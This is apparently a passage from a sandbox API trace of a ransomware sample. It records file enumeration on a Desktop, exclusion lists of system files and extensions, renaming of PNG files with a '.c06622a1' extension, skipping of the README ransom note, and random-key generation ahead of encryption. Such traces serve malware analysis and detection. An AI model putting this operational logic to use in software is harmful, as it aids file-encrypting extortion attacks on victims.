0x7 [0156.158] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0156.158] wcslen (_String="dll") returned 0x3 [0156.158] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0156.158] wcslen (_String="drv") returned 0x3 [0156.158] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0156.158] wcslen (_String="exe") returned 0x3 [0156.158] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0156.158] wcslen (_String="hlp") returned 0x3 [0156.158] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0156.158] wcslen (_String="icl") returned 0x3 [0156.158] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0156.159] wcslen (_String="icns") returned 0x4 [0156.159] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0156.159] wcslen (_String="ico") returned 0x3 [0156.159] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0156.159] wcslen (_String="ics") returned 0x3 [0156.159] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0156.159] wcslen (_String="idx") returned 0x3 [0156.159] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0156.159] wcslen (_String="ldf") returned 0x3 [0156.159] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0156.159] wcslen (_String="lnk") returned 0x3 [0156.159] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0156.159] wcslen (_String="mod") returned 0x3 [0156.159] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0156.159] wcslen (_String="mpa") returned 0x3 [0156.159] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0156.159] wcslen (_String="msc") returned 0x3 [0156.159] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0156.159] wcslen (_String="msp") returned 0x3 [0156.159] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0156.159] wcslen (_String="msstyles") returned 0x8 [0156.159] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0156.159] wcslen (_String="msu") returned 0x3 [0156.159] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0156.159] wcslen (_String="nls") returned 0x3 [0156.159] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0156.159] wcslen (_String="nomedia") returned 0x7 [0156.159] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0156.159] wcslen (_String="ocx") returned 0x3 [0156.159] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0156.159] wcslen (_String="prf") returned 0x3 [0156.160] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0156.160] wcslen (_String="ps1") returned 0x3 [0156.160] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0156.160] wcslen (_String="rom") returned 0x3 [0156.160] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0156.160] wcslen (_String="rtp") returned 0x3 [0156.160] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0156.160] wcslen (_String="scr") returned 0x3 [0156.160] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0156.160] wcslen (_String="shs") returned 0x3 [0156.160] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0156.160] wcslen (_String="spl") returned 0x3 [0156.160] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0156.160] wcslen (_String="sys") returned 0x3 [0156.160] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0156.160] wcslen (_String="theme") returned 0x5 [0156.160] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0156.160] wcslen (_String="themepack") returned 0x9 [0156.160] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0156.160] wcslen (_String="wpx") returned 0x3 [0156.160] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0156.160] wcslen (_String="lock") returned 0x4 [0156.160] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0156.160] wcslen (_String="key") returned 0x3 [0156.160] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0156.160] wcslen (_String="hta") returned 0x3 [0156.160] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0156.160] wcslen (_String="msi") returned 0x3 [0156.160] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0156.160] wcslen (_String="pdb") returned 0x3 [0156.161] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0156.161] wcslen (_String="sqlite") returned 0x6 [0156.161] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.161] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.161] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.161] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.161] wcscpy (in: _Dest=0x208e74, _Source="lL rT_iquJbDmlvt9l9.png" | out: _Dest="lL rT_iquJbDmlvt9l9.png") returned="lL rT_iquJbDmlvt9l9.png" [0156.161] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lL rT_iquJbDmlvt9l9.png", dwFileAttributes=0x80) returned 1 [0156.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lL rT_iquJbDmlvt9l9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ll rt_iqujbdmlvt9l9.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0156.161] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.161] ReadFile (in: hFile=0x1c0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.162] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x9d965f6e [0156.162] RtlComputeCrc32 (PartialCrc=0x5f6e, Buffer=0x32ec24, Length=0x80) returned 0xd6341976 [0156.162] RtlComputeCrc32 (PartialCrc=0x1976, Buffer=0x32ec24, Length=0x80) returned 0x3c270b9f [0156.162] RtlComputeCrc32 (PartialCrc=0xb9f, Buffer=0x32ec24, Length=0x80) returned 0x36791c1d [0156.162] RtlComputeCrc32 (PartialCrc=0x1c1d, Buffer=0x32ec24, Length=0x80) returned 0xf714332 [0156.162] CloseHandle (hObject=0x1c0) returned 1 [0156.162] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.162] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lL rT_iquJbDmlvt9l9.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lL rT_iquJbDmlvt9l9.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lL rT_iquJbDmlvt9l9.png" [0156.162] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lL rT_iquJbDmlvt9l9.png") returned 0x41 [0156.162] wcscpy (in: _Dest=0x218eaa, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.163] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lL rT_iquJbDmlvt9l9.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ll rt_iqujbdmlvt9l9.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lL rT_iquJbDmlvt9l9.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ll rt_iqujbdmlvt9l9.png.c06622a1"), dwFlags=0x8) returned 1 [0156.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lL rT_iquJbDmlvt9l9.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ll rt_iqujbdmlvt9l9.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c0 [0156.166] CreateIoCompletionPort (FileHandle=0x1c0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.166] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x36c0020 [0156.173] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f7c0fd8 [0156.173] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4d9f1767 [0156.173] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x28ee5171 [0156.173] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5622fa0d [0156.173] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x24a467dd [0156.173] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xc791b8d [0156.173] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x73f32e03 [0156.173] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x78ab0690 [0156.176] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x36c0094, Length=0x80) returned 0x938ff360 [0156.176] RtlComputeCrc32 (PartialCrc=0xf360, Buffer=0x36c0094, Length=0x80) returned 0xb74d32b2 [0156.176] RtlComputeCrc32 (PartialCrc=0x32b2, Buffer=0x36c0094, Length=0x80) returned 0xd91dfa12 [0156.176] RtlComputeCrc32 (PartialCrc=0xfa12, Buffer=0x36c0094, Length=0x80) returned 0xdef10628 [0156.176] RtlComputeCrc32 (PartialCrc=0x628, Buffer=0x36c0094, Length=0x80) returned 0x2e26a872 [0156.177] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x36c0020) returned 1 [0156.177] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.177] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.177] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe16680f0, ftCreationTime.dwHighDateTime=0x1d5dfdf, ftLastAccessTime.dwLowDateTime=0xf84979f0, ftLastAccessTime.dwHighDateTime=0x1d5e44c, ftLastWriteTime.dwLowDateTime=0xf84979f0, ftLastWriteTime.dwHighDateTime=0x1d5e44c, nFileSizeHigh=0x0, nFileSizeLow=0xa1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="QG826peLsBKG.png", cAlternateFileName="QG826P~1.PNG")) returned 1 [0156.177] _wcsicmp (_Str1="QG826peLsBKG.png", _Str2="README.c06622a1.TXT") returned -1 [0156.177] wcsstr (_Str="QG826peLsBKG.png", _SubStr="README") returned 0x0 [0156.177] _wcsicmp (_Str1="autorun.inf", _Str2="QG826peLsBKG.png") returned -16 [0156.177] wcslen (_String="autorun.inf") returned 0xb [0156.177] _wcsicmp (_Str1="boot.ini", _Str2="QG826peLsBKG.png") returned -15 [0156.177] wcslen (_String="boot.ini") returned 0x8 [0156.177] _wcsicmp (_Str1="bootfont.bin", _Str2="QG826peLsBKG.png") returned -15 [0156.177] wcslen (_String="bootfont.bin") returned 0xc [0156.177] _wcsicmp (_Str1="bootsect.bak", _Str2="QG826peLsBKG.png") returned -15 [0156.177] wcslen (_String="bootsect.bak") returned 0xc [0156.177] _wcsicmp (_Str1="desktop.ini", _Str2="QG826peLsBKG.png") returned -13 [0156.177] wcslen (_String="desktop.ini") returned 0xb [0156.177] _wcsicmp (_Str1="iconcache.db", _Str2="QG826peLsBKG.png") returned -8 [0156.177] wcslen (_String="iconcache.db") returned 0xc [0156.177] _wcsicmp (_Str1="ntldr", _Str2="QG826peLsBKG.png") returned -3 [0156.177] wcslen (_String="ntldr") returned 0x5 [0156.177] _wcsicmp (_Str1="ntuser.dat", _Str2="QG826peLsBKG.png") returned -3 [0156.177] wcslen (_String="ntuser.dat") returned 0xa [0156.177] _wcsicmp (_Str1="ntuser.dat.log", _Str2="QG826peLsBKG.png") returned -3 [0156.177] wcslen (_String="ntuser.dat.log") returned 0xe [0156.177] _wcsicmp (_Str1="ntuser.ini", _Str2="QG826peLsBKG.png") returned -3 [0156.177] wcslen (_String="ntuser.ini") returned 0xa [0156.178] _wcsicmp (_Str1="thumbs.db", _Str2="QG826peLsBKG.png") returned 3 [0156.178] wcslen (_String="thumbs.db") returned 0x9 [0156.178] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0156.178] wcslen (_String="386") returned 0x3 [0156.178] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0156.178] wcslen (_String="adv") returned 0x3 [0156.178] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0156.178] wcslen (_String="ani") returned 0x3 [0156.178] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0156.178] wcslen (_String="bat") returned 0x3 [0156.178] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0156.178] wcslen (_String="bin") returned 0x3 [0156.178] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0156.178] wcslen (_String="cab") returned 0x3 [0156.178] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0156.178] wcslen (_String="cmd") returned 0x3 [0156.178] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0156.178] wcslen (_String="com") returned 0x3 [0156.178] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0156.178] wcslen (_String="cpl") returned 0x3 [0156.178] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0156.178] wcslen (_String="cur") returned 0x3 [0156.178] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0156.178] wcslen (_String="deskthemepack") returned 0xd [0156.178] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0156.178] wcslen (_String="diagcab") returned 0x7 [0156.178] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0156.179] wcslen (_String="diagcfg") returned 0x7 [0156.179] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0156.179] wcslen (_String="diagpkg") returned 0x7 [0156.179] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0156.179] wcslen (_String="dll") returned 0x3 [0156.179] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0156.179] wcslen (_String="drv") returned 0x3 [0156.179] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0156.179] wcslen (_String="exe") returned 0x3 [0156.179] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0156.179] wcslen (_String="hlp") returned 0x3 [0156.179] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0156.179] wcslen (_String="icl") returned 0x3 [0156.179] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0156.179] wcslen (_String="icns") returned 0x4 [0156.179] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0156.179] wcslen (_String="ico") returned 0x3 [0156.179] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0156.179] wcslen (_String="ics") returned 0x3 [0156.179] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0156.179] wcslen (_String="idx") returned 0x3 [0156.179] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0156.179] wcslen (_String="ldf") returned 0x3 [0156.179] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0156.179] wcslen (_String="lnk") returned 0x3 [0156.179] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0156.179] wcslen (_String="mod") returned 0x3 [0156.179] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0156.179] wcslen (_String="mpa") returned 0x3 [0156.179] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0156.179] wcslen (_String="msc") returned 0x3 [0156.179] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0156.179] wcslen (_String="msp") returned 0x3 [0156.180] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0156.180] wcslen (_String="msstyles") returned 0x8 [0156.180] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0156.180] wcslen (_String="msu") returned 0x3 [0156.180] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0156.180] wcslen (_String="nls") returned 0x3 [0156.180] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0156.180] wcslen (_String="nomedia") returned 0x7 [0156.180] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0156.180] wcslen (_String="ocx") returned 0x3 [0156.180] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0156.180] wcslen (_String="prf") returned 0x3 [0156.180] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0156.180] wcslen (_String="ps1") returned 0x3 [0156.180] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0156.180] wcslen (_String="rom") returned 0x3 [0156.180] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0156.180] wcslen (_String="rtp") returned 0x3 [0156.180] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0156.180] wcslen (_String="scr") returned 0x3 [0156.180] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0156.180] wcslen (_String="shs") returned 0x3 [0156.180] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0156.180] wcslen (_String="spl") returned 0x3 [0156.180] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0156.180] wcslen (_String="sys") returned 0x3 [0156.180] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0156.180] wcslen (_String="theme") returned 0x5 [0156.181] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0156.181] wcslen (_String="themepack") returned 0x9 [0156.181] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0156.181] wcslen (_String="wpx") returned 0x3 [0156.181] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0156.181] wcslen (_String="lock") returned 0x4 [0156.181] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0156.181] wcslen (_String="key") returned 0x3 [0156.181] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0156.181] wcslen (_String="hta") returned 0x3 [0156.181] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0156.181] wcslen (_String="msi") returned 0x3 [0156.181] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0156.181] wcslen (_String="pdb") returned 0x3 [0156.181] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0156.181] wcslen (_String="sqlite") returned 0x6 [0156.181] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.181] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.181] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.181] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.181] wcscpy (in: _Dest=0x208e74, _Source="QG826peLsBKG.png" | out: _Dest="QG826peLsBKG.png") returned="QG826peLsBKG.png" [0156.181] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QG826peLsBKG.png", dwFileAttributes=0x80) returned 1 [0156.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QG826peLsBKG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qg826pelsbkg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0156.182] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.182] ReadFile (in: hFile=0x1d8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.183] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x9f323d [0156.183] RtlComputeCrc32 (PartialCrc=0x323d, Buffer=0x32ec24, Length=0x80) returned 0x1f802e24 [0156.183] RtlComputeCrc32 (PartialCrc=0x2e24, Buffer=0x32ec24, Length=0x80) returned 0xfe777955 [0156.183] RtlComputeCrc32 (PartialCrc=0x7955, Buffer=0x32ec24, Length=0x80) returned 0x520e6fac [0156.183] RtlComputeCrc32 (PartialCrc=0x6fac, Buffer=0x32ec24, Length=0x80) returned 0x713f7024 [0156.183] CloseHandle (hObject=0x1d8) returned 1 [0156.183] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.183] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QG826peLsBKG.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QG826peLsBKG.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QG826peLsBKG.png" [0156.183] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QG826peLsBKG.png") returned 0x3a [0156.183] wcscpy (in: _Dest=0x218e9c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.183] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QG826peLsBKG.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qg826pelsbkg.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QG826peLsBKG.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qg826pelsbkg.png.c06622a1"), dwFlags=0x8) returned 1 [0156.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\QG826peLsBKG.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qg826pelsbkg.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d8 [0156.186] CreateIoCompletionPort (FileHandle=0x1d8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.186] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3750020 [0156.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1fad5b80 [0156.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x482133cc [0156.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3bc46c1f [0156.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6c70b234 [0156.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5919d27 [0156.193] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x24fffd53 [0156.194] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x65d06178 [0156.194] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6013780c [0156.197] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3750094, Length=0x80) returned 0x60d672a2 [0156.197] RtlComputeCrc32 (PartialCrc=0x72a2, Buffer=0x3750094, Length=0x80) returned 0x6634f0aa [0156.197] RtlComputeCrc32 (PartialCrc=0xf0aa, Buffer=0x3750094, Length=0x80) returned 0x130307d [0156.197] RtlComputeCrc32 (PartialCrc=0x307d, Buffer=0x3750094, Length=0x80) returned 0x98ca1e97 [0156.197] RtlComputeCrc32 (PartialCrc=0x1e97, Buffer=0x3750094, Length=0x80) returned 0x6261b7fa [0156.197] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3750020) returned 1 [0156.197] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.197] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.197] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a7cdc00, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x8a7cdc00, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8a7cdc00, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.197] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.197] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc32347d0, ftCreationTime.dwHighDateTime=0x1d5dc3e, ftLastAccessTime.dwLowDateTime=0xf89dc8b0, ftLastAccessTime.dwHighDateTime=0x1d5e542, ftLastWriteTime.dwLowDateTime=0xf89dc8b0, ftLastWriteTime.dwHighDateTime=0x1d5e542, nFileSizeHigh=0x0, nFileSizeLow=0x58e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="sL3sOSs.wav", cAlternateFileName="")) returned 1 [0156.197] _wcsicmp (_Str1="sL3sOSs.wav", _Str2="README.c06622a1.TXT") returned 1 [0156.197] wcsstr (_Str="sL3sOSs.wav", _SubStr="README") returned 0x0 [0156.197] _wcsicmp (_Str1="autorun.inf", _Str2="sL3sOSs.wav") returned -18 [0156.197] wcslen (_String="autorun.inf") returned 0xb [0156.197] _wcsicmp (_Str1="boot.ini", _Str2="sL3sOSs.wav") returned -17 [0156.197] wcslen (_String="boot.ini") returned 0x8 [0156.197] _wcsicmp (_Str1="bootfont.bin", _Str2="sL3sOSs.wav") returned -17 [0156.197] wcslen (_String="bootfont.bin") returned 0xc [0156.197] _wcsicmp (_Str1="bootsect.bak", _Str2="sL3sOSs.wav") returned -17 [0156.197] wcslen (_String="bootsect.bak") returned 0xc [0156.197] _wcsicmp (_Str1="desktop.ini", _Str2="sL3sOSs.wav") returned -15 [0156.197] wcslen (_String="desktop.ini") returned 0xb [0156.197] _wcsicmp (_Str1="iconcache.db", _Str2="sL3sOSs.wav") returned -10 [0156.198] wcslen (_String="iconcache.db") returned 0xc [0156.198] _wcsicmp (_Str1="ntldr", _Str2="sL3sOSs.wav") returned -5 [0156.198] wcslen (_String="ntldr") returned 0x5 [0156.198] _wcsicmp (_Str1="ntuser.dat", _Str2="sL3sOSs.wav") returned -5 [0156.198] wcslen (_String="ntuser.dat") returned 0xa [0156.198] _wcsicmp (_Str1="ntuser.dat.log", _Str2="sL3sOSs.wav") returned -5 [0156.198] wcslen (_String="ntuser.dat.log") returned 0xe [0156.198] _wcsicmp (_Str1="ntuser.ini", _Str2="sL3sOSs.wav") returned -5 [0156.198] wcslen (_String="ntuser.ini") returned 0xa [0156.198] _wcsicmp (_Str1="thumbs.db", _Str2="sL3sOSs.wav") returned 1 [0156.198] wcslen (_String="thumbs.db") returned 0x9 [0156.198] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0156.198] wcslen (_String="386") returned 0x3 [0156.198] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0156.198] wcslen (_String="adv") returned 0x3 [0156.198] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0156.198] wcslen (_String="ani") returned 0x3 [0156.198] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0156.198] wcslen (_String="bat") returned 0x3 